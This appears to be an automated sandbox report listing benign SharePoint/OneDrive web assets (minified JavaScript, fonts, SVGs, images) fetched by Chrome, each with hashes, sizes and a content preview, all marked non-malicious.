                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[92847],{822866:(e,t,n)=>{n.d(t,{D:()=>r});var a=n(295610),i=new Map;function r(e,t,n){var r=void 0!==n?n:{};return i.forEach(function(n,i){var o;(void 0===n.precond||n.precond(e,t))&&(r instanceof Headers?r.has(i)||r.set(i,n.value):void 0!==r&&(i in r||(r=(0,a.__assign)((0,a.__assign)({},r),((o={})[i]=n.value,o)))))}),r}}.,224252:(e,t,n)=>{var a;function i(e,t,n,i){n=n||{},i=i||{};var r=[e,t].filter(function(e){return e.length}).join("/"),o={id:"",apiVersion:""},s=r.replace(/:(\w+?)(\W|$)/g,function(e,t,r){if(!n[t])return""+r;var s=n[t];return"string"==typeof s&&"@"===s[0]&&(s=a.lookupDottedPath(i||{},s.substring(1))),"function"==typeof s&&(s=s()),o[t]=s,s+r}),c={};Object.keys(n).forEach(function(e){if(!o[e]){var t=n[e];c[e]="function"==typeof t?t():t}}),s=s.split("://").map(function(e){return e.replace(/[\/]{2,}/g,"/")}).join("://"),s=a.encodeUri(s);var d=a.getQueryString(c);return d&&(s=s+
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (65308), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):272685
                                                  Entropy (8bit):5.704339403913183
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4B388273D337DC67785E5F7853C09839
                                                  SHA1:D91D870126D61F6E4BF8AEF3D6C482D9BF431F6B
                                                  SHA-256:5718640C19EDDF9FB27EF47B8812DD0DB6A670E956364BB0F11A811A6BBE3845
                                                  SHA-512:25166EDC93CF0267C532B3DC79B82E1205246F50E3F23D5D7CFE693B73DB33D133AF4BB03B6DE6251F7A0A7FA00D4C01D39697B9C8A5A89E88D540A0918E785C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_core_start"),function(){var e,t,n,o,r,i={12792:function(e,t,n){"use strict";var o;n.d(t,{f:function(){return o}}),function(e){e.depth0="0 0 0 0 transparent",e.depth4="0 1.6px 3.6px 0 rgba(0, 0, 0, 0.132), 0 0.3px 0.9px 0 rgba(0, 0, 0, 0.108)",e.depth8="0 3.2px 7.2px 0 rgba(0, 0, 0, 0.132), 0 0.6px 1.8px 0 rgba(0, 0, 0, 0.108)",e.depth16="0 6.4px 14.4px 0 rgba(0, 0, 0, 0.132), 0 1.2px 3.6px 0 rgba(0, 0, 0, 0.108)",e.depth64="0 25.6px 57.6px 0 rgba(0, 0, 0, 0.22), 0 4.8px 14.4px 0 rgba(0, 0, 0, 0.18)"}(o||(o={}))},83779:function(e,t,n){"use strict";n.d(t,{I:function(){return c}});var o=/[\(\[\{\<][^\)\]\}\>]*[\)\]\}\>]/g,r=/[\0-\u001F\!-/:-@\[-`\{-\u00BF\u0250-\u036F\uD800-\uFFFF]/g,i=/^\d+[\d\s]*(:?ext|x|)\s*\d+$/i,s=/\s+/g,a=/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF\u1100-\u11FF\u3130-\u318F\uA960-
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 17436, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):17436
                                                  Entropy (8bit):7.981296837768848
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1483728740CB3D9E9869528DAE5DCE1A
                                                  SHA1:610B0012C154856DD1B6B2B7946FA7F20257C51A
                                                  SHA-256:9557526EF142FD9772F887D466FE0C80DF4B0463A9ADA4BD99CF14C9CC4F62DA
                                                  SHA-512:433ACBD1EEDA7593F44C8C865D3BCE87A9F07D1CF58A8E5D28619EF2A823793CC7FAE45E3F98ECB44A7F66DD2AD27927C7C98B616E9C26C6A68AEAF99961D8E2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-20-b8a27ea3.woff
                                                  Preview:wOFF......D.......u.........................OS/2.......G...`?.v.cmap...P.......J}\.<gasp...<............glyf...H..<k..f,.C..head..>....5...6(j..hhea..>........$.|..hmtx..?....v......8.loca..?.........<.^maxp..@L....... ...2name..@d.......O..R.post..D........ ....x.c`.`a......j.r...a&.f:..$...bdb..........+(08|..#.....`u,...........x....JBa.....z..b..d..E...e....hS........=B......L........7p...l~0"..|2.l.kXs..s..-9...z....C}..}...N.[.4b..I.s.Y.Y.!.Xc.M......W.D......y6...9_..C&..99s.XY8.....k.PC...QD..h..:...2J8...D.;.`.?`.)$..8......W...J......qG...............x..}i`..hU..s.LO...C.I#i4...u..o,...-c.6.`....1`c.......^..A.....$$!@.6.#.nx.\..f.M.K3.WU.3..&..}?...:..............=....P..lH.1....Hq.z..3u'.......@..9A.t.........Bs7..5.).`.H.....S.P..y~*#..-.&.Jh".x.9....\..Pv...3G.....8'...i.n....q..>\.j..8zdKW.#......&....&...\..q.;./.G..D.D...u..HD...gm...S....i..! ...)...$\?./.T m..J....}..5..A.;.Z..{<.0......~.\....x<..0.....<.F&Q.&x..!~N.....K.C./..1?..u
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 15152, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):15152
                                                  Entropy (8bit):7.975837827549664
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:71C6CE41CD1A7B9DEFAA9D9D739BE12E
                                                  SHA1:ED30186F02C259A162F962D7861861C41EE25817
                                                  SHA-256:B862306928A5699966E7579C3AF5A857D4C2B634F764D45DEA2F6360DFCD5888
                                                  SHA-512:B34C5D8994B6C3CA5FE8B7E1C8988DFC90AAF0E9B7ED2583D6D7A46C17FE8428099BDDBB5E640F2E00832263635A0F9C02360FCB3AF402CFC7294910BE874659
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-6-7ab2496d.woff
                                                  Preview:wOFF......;0......z.........................OS/2.......G...`1=h.cmap...P...j.....r..gasp................glyf......3...jL...head..5....4...6#...hhea..6........$....hmtx..6 ...r.......loca..6.........}5..maxp..7`....... .r..name..7x.......O..R.post..;........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px.......`u,......9..c.x...I(.P.....!E.z.H.!ea(S......G.z.BXJ.2..<CI,...N2-H....d.....(;N.{:....QJ.....W.N=.l...Z.!....S..Lf3.y.g..hf%kia=...n.......G9..Nr..\.:7....q..<..OxJ......y.;>..|.%...{q.'q..q.w..O.x........DH.DI..R?.j>e]Z..Ef..-..m.~.m..od/6...2,a.s...V1.+.p.1.`...@/..6T`.M.....D..Q.....%hF....G........HB....l.b.... .Y.@ ......A.N.!..p3=..M....+..28.......C.l..............x..}.`..hU..............s$.i[.X.-..e.....`........q .`...Ip.,I... ..9.....d....!.I...-M.WUw.F.l..........U.zU.....p......r...p..5cQznq......72..8.8....~.`....\.>...@...=0.Cg3I*.../..S.o.....ed.4k....~I*.ez.N.{ j..\v*.M.N...{..."...H...#)/s.G.?.....j...h~"....a{M..qZZ.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 24x24, 32 bits/pixel
                                                  Category:dropped
                                                  Size (bytes):7886
                                                  Entropy (8bit):3.1280056112498884
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:604ADFB53677B5CA4F910FFB131B3E7C
                                                  SHA1:5F1A0FB4E4AD3707E591CE16352158263488ED70
                                                  SHA-256:24638331466A52BB66F912090E7A9CC9E3DF2236E39C187C9409104526B472B0
                                                  SHA-512:35F618F42ADFEE6D1335C67F729C298789419FE2930371A91683F60481794488DFAF15B572E6FC1BE70833EF12DFE57432725F6336B6B73DCFB52596F57F30A5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...... .... .....6......... ............... .h...f...(... ...@..... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(`.(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(p.....................
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (911)
                                                  Category:downloaded
                                                  Size (bytes):2113
                                                  Entropy (8bit):5.375724094824906
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:08D4677F7BC16FA2ABF51C7A6EA5E52D
                                                  SHA1:D93B99CB7BBDF519C5086BED9EF05EEDB7DF0B18
                                                  SHA-256:F43DC5275E616537D954DA148638EAB230D30CEF7DE0CFE125ECE1B53C22288A
                                                  SHA-512:CD37FFBE5ACF357F6D559B0E03B1D4EEBE95C4D0961EFF2C967D850EE341CBE5824620734DE26316BB21C0F70AC7E9AE95FD63EB786280125852EC71E273C463
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/331.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[331,1064],{2787:function(e,t,n){n.r(t),n.d(t,{docAlreadyExists:function(){return s},fileNotFound:function(){return i},invalidView:function(){return r},listNotFound:function(){return o},newExperieceRenderingNotSupported:function(){return d},offline:function(){return f},onePageNavigationError:function(){return u},onePageNavigationViewMismatch:function(){return l},parsingError:function(){return p},queryThrottled:function(){return c},urlTooLongError:function(){return a.a}});var a=n(604),i=-2147024894,r=-2147024809,o=-1,s=-2130575257,c=-2147024860,d=-2,l=-3,u=-4,f=-5,p=-7}.,2786:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return c},c:function(){return o},d:function(){return s},e:function(){return r}});var a,i=n(2787);!function(e){e[e.icon=16]="icon",e[e.iconMin=16]="iconMin",e[e.bigIcon=48]="bigIcon",e[e.bigIconMin=48]="bigIconMin",e[e.regularMin=90]="regularMin",e[e.regular=130]="regular",e[e.nameM
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (7715)
                                                  Category:downloaded
                                                  Size (bytes):34087
                                                  Entropy (8bit):5.406441721525349
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:089A3D83A4D86C316365FDD9552D2ECB
                                                  SHA1:FE062F39B9949E51717452B9B4623B18C8AA50A1
                                                  SHA-256:A768D3F7152F6B927C0ACD3B8E8B5D4C68F847A6E1466C300C504FF2B79CF74E
                                                  SHA-512:13966976266A5CA49D25031009B2D056C0885CDC2FA5D6DDCB955D7F34008204F3E8397DE01D1087032D65FF334AD8705133BC286079D6B901A27912FA776502
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/22663.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[22663,57525],{593280:(e,t,n)=>{n.d(t,{k:()=>r});var a=n(408156),i=n(376192);function r(e){var t=a.useState(e),n=t[0],r=t[1];return[n,{setTrue:(0,i.B)(function(){return function(){r(!0)}}),setFalse:(0,i.B)(function(){return function(){r(!1)}}),toggle:(0,i.B)(function(){return function(){r(function(e){return!e})}})}]}}.,106824:(e,t,n)=>{n.d(t,{G:()=>r});var a=n(408156),i=n(376192);function r(e,t,n){var r=a.useState(t),o=r[0],s=r[1],c=(0,i.B)(void 0!==e),d=c?e:o,l=a.useRef(d),u=a.useRef(n);a.useEffect(function(){l.current=d,u.current=n});var f=(0,i.B)(function(){return function(e,t){var n="function"==typeof e?e(l.current):e;u.current&&u.current(t,n),c||s(n)}});return[d,f]}}.,713983:(e,t,n)=>{n.d(t,{Zlo:()=>i,rIv:()=>r});var a=n(875427);const i=(0,a.k)("ArrowExportLtr16Regular","16",["M1.5 3c.28 0 .5.22.5.5V12a.5.5 0 0 1-1 0V3.5c0-.28.22-.5.5-.5Zm9.15.65c.2-.2.5-.2.7 0l3.5 3.5c.2.2.2.5 0 .7l-3.5
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (4670)
                                                  Category:dropped
                                                  Size (bytes):10888
                                                  Entropy (8bit):5.355170288973177
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4ECEF37610E2800719404A7B497C0AC7
                                                  SHA1:A89D14937F4B2C3DE7AF77EF92D3BE3CC912D4AC
                                                  SHA-256:E6AD49856E4D379858DCAC3B473EBFD53DFF61A5F2066E9077036935BC1E58CD
                                                  SHA-512:B71F9BECBED1650878F6F92C39178A4AF267DB887C1E6E5FF9947B37F7D83B5E9EDD819056F5DAA82C767492D87E3559470D96072002D8A48730B5F5C6B940CA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[273],{4123:function(e,t,n){n.d(t,{a:function(){return r},b:function(){return o}});var a=n(0),i=n(188),r=new a.a("followed"),o=new i.a("followedItem")}.,4673:function(e,t,n){n.d(t,{a:function(){return r}});var a=n(5),i=n(2007);function r(e,t){var n,r=t.itemKey,o=t.isMountPoint,s=e.demandItemFacet(a.r,r);if(e.demandItemFacet(a.v,null==s?void 0:s.itemKey))return!0;var c=null===(n=e.demandItemFacet(a.o,r))||void 0===n?void 0:n.extension;return(0,i.a)({extension:c,isMountPoint:o,isList:!1})}}.,2171:function(e,t,n){n.r(t),n.d(t,{spFavoritesAddon:function(){return x}});var a=n(21),i=n(67),r=n(5),o=n(29),s=n(72),c=n(5836),d=n(860),l=n("tslib_102"),u=n(48),f=n(862),p=n(4123),m=n(22),_=n(4673),h=n("odsp.util_460"),b=n(6),g=n(7),v=n(34),y=n(1576),S=!h.HW.isActivated("F01DE29D-B569-499E-83F8-AF66263E0852","03/24/2023","Do not show favorite command until data resolves");function D(e,t){var n=t.itemKeys,a=y.a.serialize({})
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65019)
                                                  Category:downloaded
                                                  Size (bytes):106392
                                                  Entropy (8bit):5.141848536376426
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:38DAFAA547111B1C370BA5ADA7893C27
                                                  SHA1:B16CA0A6F1156B318AD4D39C5F09420E30B06B9E
                                                  SHA-256:F1F42C4609591E62CC2884D5EACE4CBB53A1DE44AEE57CB92CF81C3B4EFA9D66
                                                  SHA-512:8A83539F64C98CA4FA9030E965D875DE66FB0A91F985400328DE17D5ACB532EDECF8DA5C31EA34EB81E2F7C6A663B2FE1349D4F4A7F4C5924C5A8469A06D3A04
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/165.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[165],{2553:function(e,t){var n=/[<>&'"\\]/g,a=/(&lt;|&gt;|&amp;|&quot;|&#39;|&#92;)/g,i={"<":"&lt;",">":"&gt;","&":"&amp;",'"':"&quot;","'":"&#39;","\\":"&#92;"},r={"&lt;":"<","&gt;":">","&amp;":"&","&quot;":'"',"&#39;":"'","&#92;":"\\"};function o(e){return i[e]}var s=function(){function e(){}return e.encodeText=function(e){return e?e.replace(n,o):""},e.decode=function(e){return e?e.replace(a,function(e){return r[e]}):""},e}();t.a=s}.,4682:function(e,t,n){(0,n("fui.util_369").Bv)([{rawString:"html body .ms-bgColor-communicationShade30,html body .ms-bgColor-communicationShade30--hover:hover{background-color:#004578}html body .ms-bgColor-communicationShade20,html body .ms-bgColor-communicationShade20--hover:hover{background-color:#005a9e}html body .ms-bgColor-communicationShade10,html body .ms-bgColor-communicationShade10--hover:hover{background-color:#106ebe}html body .ms-bgColor-communicationPrimary,html bod
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):8119
                                                  Entropy (8bit):4.587721068903943
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D3E99DC5C534B41FAC830E37F9C7CF79
                                                  SHA1:3361024E24A7A289D7456C752A815204B5089086
                                                  SHA-256:DD83F95D0017AACB701E9681ED4528E949419F34B6E85B7A7A44D861500DCDD0
                                                  SHA-512:FF05AC4845DE73B166F54E6604EB68187E49F6CE599073633DB81B0804EE4C687BE04AD0826FABB7C0D619B353BE9DEABF009F8B9960B72C1C20355DD9BAEBD6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_folder_v2.svg
                                                  Preview:<svg id="GRAPHICS" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="208" height="208" viewBox="0 0 208 208"><defs><radialGradient id="radial-gradient" cx="795.872" cy="-34.38" r="28.576" gradientTransform="matrix(0.984, -0.176, 0.178, 0.992, -701.145, 258.267)" gradientUnits="userSpaceOnUse"><stop offset="0.338" stop-color="#797673"/><stop offset="0.513" stop-color="#979592"/><stop offset="0.701" stop-color="#b1afac"/><stop offset="0.869" stop-color="#c1bebc"/><stop offset="1" stop-color="#c6c4c2"/></radialGradient><linearGradient id="linear-gradient" x1="-131.655" y1="376.681" x2="-175.845" y2="285.033" gradientTransform="translate(263.822 -169.877) rotate(5.61)" gradientUnits="userSpaceOnUse"><stop offset="0.002" stop-color="#f5b453"/><stop offset="0.295" stop-color="#fed494"/></linearGradient></defs><path d="M150.127,192.54s85.6-47.916,48.465-73.7C163.474,94.45,219.258,73.41,195.977,43.19c-43.184-56.056-69.869-8.681-124.782-7.226-83.687,2.218-81.1
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):1500
                                                  Entropy (8bit):7.676946629163264
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:654254813B3B6CF7342CBE7AF529AC20
                                                  SHA1:1DC0E0A3CA5A453DFEFFEBD9A749551FCBA21AC6
                                                  SHA-256:FA317F1A5CF832C5BF7A5344322DFFAC09EAC2A03B4312E821B827C873799FE0
                                                  SHA-512:1A06F8DE9CC32F190039DBF63A7BCF71C6A2DFB4B983BC8CDEEA8C6239DD659B2E1E5CEDEEF3EBA95CD1F7AB21347AE45C492CD3B9F0844D5980360EA53DC9C6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://hidrotehnik-my.sharepoint.com/_layouts/15/userphoto.aspx?size=M&accountname=urska.zupanc-lasic%40hidrotehnik.si
                                                  Preview:.PNG........IHDR...`...`......w8....sRGB.........gAMA......a.....pHYs..........o.d...qIDATx^..n.0.....f.{C..{Ez....= 9.+.6.h....i}k-EQ.U.TL..#.aG.......;..v. ..@....#.aG....]w.z{{M..._S.SOV..........K....wsxxh...Mss3.9Z.........C......eZ[[...fu...........W...`.....h.*.}}}.....a1:??W.4..088...e....tuu...........p........A^_............ijj".(........!].b..(.d)....$.....e..izzzR.`.....VVV..-..y9V.......B..i.....v.d.8..8-.............8.........yI/.......[.!.....M...$..2;...={.:.j).'.......[.!,.8......&a=B..ev..Hj.d....w..E?....m=...2;...]{.:.. *N...X^^...C...8...`dd......2;.m....92N.....TC!..R1rY...^.w=<<..qZ....1H....X:..........b.p.R].......-...Z..sZ........G;,|...&.(..i`Y]...A.!eq.0..q.m.mmmd.RV....W.;_.=...$.1.a...h8..5..a.A?.-.iV.....V.y....gUm.iV..j........*.9OMM.?.Y5+.....IZ......brD...............e...%.....D.y85..-..P.[.K....N0%..@8.L....7....[....E.4.CCC^....9...o......2.....[..~...D}n^.7.ObH......Q..PcA.+.NNN.]....0To..M]#...qS|C...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (25926)
                                                  Category:downloaded
                                                  Size (bytes):29350
                                                  Entropy (8bit):5.2837304346281035
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F21103843FFF690329892ED634498B98
                                                  SHA1:01FB9AB48910E16DEC140ADFD018719CF4400ACD
                                                  SHA-256:C694D338A19AA6D0EA8D95CD21FAA97B84AF43FE0749C5B7D7539B8EC2992F97
                                                  SHA-512:4E8105C88DF6259F3446D9FC7BDA9540C6216D20AB7FF0CC22BA5FDEEA76F8856EC58625FBACFC1E2D313BB6942F415788EE76F7F823A07F8128817E9E19E4B4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/70906.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[70906],{37318:(e,t,n)=>{n.d(t,{h:()=>m});var a=n(408156);function i(e,t){if(!e)return;const n=e;n._virtual||(n._virtual={}),n._virtual.parent=t}var r=n(666173),o=n(329989);const s=a.createContext(void 0);s.Provider;var c=n(650039),d=n(671433),l=n(259948);const u=(0,n(369545).s)({root:{qhf8xq:"f1euv43f",Bhzewxz:"f15twtuk",oyh7mz:["f1vgc2s3","f1e31b4d"],j35jbq:["f1e31b4d","f1vgc2s3"],Bj3rh1h:"f494woh"}},{d:[".f1euv43f{position:absolute;}",".f15twtuk{top:0;}",".f1vgc2s3{left:0;}",".f1e31b4d{right:0;}",".f494woh{z-index:1000000;}"]}),f=a.useInsertionEffect;var p=n(447111);const m=e=>{return t=(e=>{const{element:t,className:n}=function(e){return(0,r.R)(e)?{element:e}:"object"==typeof e?null===e?{element:null}:e:{}}(e.mountNode),p=a.useRef(null),m=(e=>{const{targetDocument:t,dir:n}=(0,o.O)(),i=a.useContext(s),r=(0,l._)(),p=u(),m=(0,c.H)(),_=(0,d.z)(m,p.root,e.className),h=null!=i?i:null==t?void 0:
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (3923)
                                                  Category:downloaded
                                                  Size (bytes):4375
                                                  Entropy (8bit):5.390199722692939
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4AE5996535F6726E8BF26081B273BC26
                                                  SHA1:CBDE3EA066F3906A963CB2665AAC9CA709CC124D
                                                  SHA-256:1C763683ACAE8EA1B93F5C5969BE3791385725DF7A350DB80D78B994133F2DB5
                                                  SHA-512:562E0F55323559AC7B0D5C6CCBCB964419BBAE2FB74D48C385AFA1D173D4F077CB2B9F4F67E0053FFD1481A37CF57ABA45063999EC1A74D7476D3C38E81FBD57
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/966.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[966],{2949:function(e,t,n){n.r(t),n.d(t,{getDownloadData:function(){return _},getDownloadFormData:function(){return b},getMalwareDownloadUrl:function(){return g}});var a=n("tslib_102"),i=n(6),r=n(184),o=n(3819),s=n(79),c=n(300),d=n(28),l=n(101),u=n(80),f=n(10),p=n("odsp.util_460"),m=n(105);function _(e){var t=this,n=e.spItem,s=e.folderPath,f=e.uniqueId,m=e.layoutsUrl,_=e.authenticationMode,h=e.spCookieDomainConfiguration,b=n.webAbsoluteUrl,g=n.listFullUrl,v=!h||new d.a(h).authority!==new d.a(b).authority;return function(e){return(0,a.Zd)(t,void 0,void 0,function(){var t,n,d,y,S;return(0,a.qr)(this,function(D){return t=e((0,u.a)({disableDownloadWithAspxUrlWithToken:i.A})).disableDownloadWithAspxUrlWithToken,n=void 0!==t&&t,d=e((0,u.a)({enableOAuthTokenInDownload:i.Y})).enableOAuthTokenInDownload,y=void 0!==d&&d,S="required"===_||n&&!y?h&&f&&!v&&"required"!==_?function(e){var t=this,n=e.webAbsoluteUrl,i=e.layou
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (13879)
                                                  Category:downloaded
                                                  Size (bytes):452820
                                                  Entropy (8bit):5.413727622366833
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3B88ED72B56CCD463FBFF85613886E37
                                                  SHA1:3CB66C4445C216E934D916C8A4A6183F5001CABA
                                                  SHA-256:FEF988A403A120FBCA8FE68130FD234E728A02DE2FD3D9E3CF6B6672FA8DF357
                                                  SHA-512:D5B921E84A9CA30C31C1BE84880EE6FD0FC40512FDFC20D315F262EADD0DB581010FC43A59C96DED525CDDE27F4E7A6C49FA6762BE9044D69E546CAF136937F6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-08-23.009/spserviceworker.js
                                                  Preview:/*! For license information please see spserviceworker.js.LICENSE.txt */.(()=>{var e=[(e,t,n)=>{"use strict";n.d(t,{a:()=>a,b:()=>o,c:()=>c,d:()=>s,e:()=>i,f:()=>_,g:()=>r,h:()=>d,i:()=>u,j:()=>l,k:()=>m,l:()=>f,m:()=>p});const a=self.location.protocol+"//"+self.location.host,i=new URL(self.location.href),r=i.searchParams.get("userId"),o={NavigationPreload:"Service-Worker-Navigation-Preload",ApplicationId:"X-Service-Worker-Application-Id",InPlaceNav:"X-Service-Worker-In-Place-Nav",NavPrefetch:"X-RequestPrefetchLink",LkgPrefetch:"X-RequestPrefetchData",FromServiceWorker:"X-From-Service-Worker",SyntheticNavigation:"X-Service-Worker-Synthetic",PrefetchAndCoalesce:"X-Service-Worker-Prefetch-And-Coalesce",Coalesced:"X-Service-Worker-Coalesced",PrefetchStart:"X-Service-Worker-Prefetch-Start"},s=`${a}/sw-loopback/`,c="/_api/sw-loopback/",d={active:!1},l={active:!1},u={active:!1},f={active:!1},p={active:!1},m={active:!1},_="true"===i.searchParams.get("siteConfigRace")}.,(e,t,n)=>{"use strict";
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (4142)
                                                  Category:dropped
                                                  Size (bytes):20552
                                                  Entropy (8bit):5.197356330631237
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0A01A1342477A6A3331C093E12B9A6E7
                                                  SHA1:046BA4D8869EE774BC348E9058F148F759E9C5DC
                                                  SHA-256:C8ACDB6E136EA7BB9E0DF64B147DA44B015EA8054F49B86A7F5E01DFE06D9903
                                                  SHA-512:E1DC2C206180924F8C3FB8CD2D358641E6C1937361CBBF9F94BD11A1F557987B062771925A11F73F1D196851FEC38209BD6325BA376D2C654184139B51AA06EB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[38],{2660:function(e,t,n){n.d(t,{a:function(){return o}});var a=n(203),i=n(27),r=n(10),o=(n(106),(0,a.a)({eventName:"Action,Qos,",shortEventName:"Action"},{pageType:i.a.String,queryType:i.a.String,logStartEnd:i.a.Boolean},r.a))}.,2929:function(e,t,n){var a=n(20),i=n(122),r=function(){function e(e){this.concurrency=e||1,this._running=0,this._queue=[],this._promiseComplete=this._promiseComplete.bind(this)}return e.prototype.enqueue=function(e){var t;if(this._running<this.concurrency)this._running++,(t=e()).then(this._promiseComplete,this._promiseComplete);else{var n={callback:e,signal:null,canceled:!1,result:null};n.signal=new i.b(function(){n.canceled=!0,a.c.is(n.result)&&n.result.cancel()}),this._queue.push(n),t=n.signal.getPromise()}return a.c.resolve(t)},e.prototype._promiseComplete=function(){var e=this;if(this._running--,this._running<this.concurrency&&this._queue.length){for(var t=this._queue.shift();t&&
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):19403
                                                  Entropy (8bit):4.185434199284073
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:39A94ED0951601969B638ED1CC945A1D
                                                  SHA1:AA8EA3137FB98F0390B598E68F1DE78E191552EC
                                                  SHA-256:6B1B621F82EC75D0DB1538C7725B67D303C8670084E1ABB01D84C7A4CFF3CAC3
                                                  SHA-512:04DF7063C6AB8BB8DAB9E304054AC94ED7E932E9FA84473F74A45B034A5C6852C32E6F5E02CC2DEE8030CAC89A92FDDC09543A9A8A7EE401348D1EE57F383A92
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_sharedbyme_dark.svg
